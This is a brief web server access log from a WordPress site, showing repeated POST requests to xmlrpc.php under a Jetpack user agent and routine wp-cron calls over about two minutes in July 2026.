182.48.211.154 - - [21/Jul/2026:19:48:34 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Jetpack by WordPress.com"
182.48.211.154 - - [21/Jul/2026:19:48:52 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Jetpack by WordPress.com"
198.177.124.148 - - [21/Jul/2026:19:49:39 +0000] "POST /wp-cron.php?doing_wp_cron=1784663379.0670909881591796875000 HTTP/1.1" 200 - "-" "WordPress/7.0.2; https://digitalclass.shop"
182.48.211.154 - - [21/Jul/2026:19:49:35 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Jetpack by WordPress.com"
182.48.211.154 - - [21/Jul/2026:19:49:46 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.4)"
182.48.211.154 - - [21/Jul/2026:19:50:18 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.4)"
198.177.124.148 - - [21/Jul/2026:19:50:31 +0000] "POST /wp-cron.php?doing_wp_cron=1784663431.4183080196380615234375 HTTP/1.1" 200 - "-" "WordPress/7.0.2; https://digitalclass.shop"
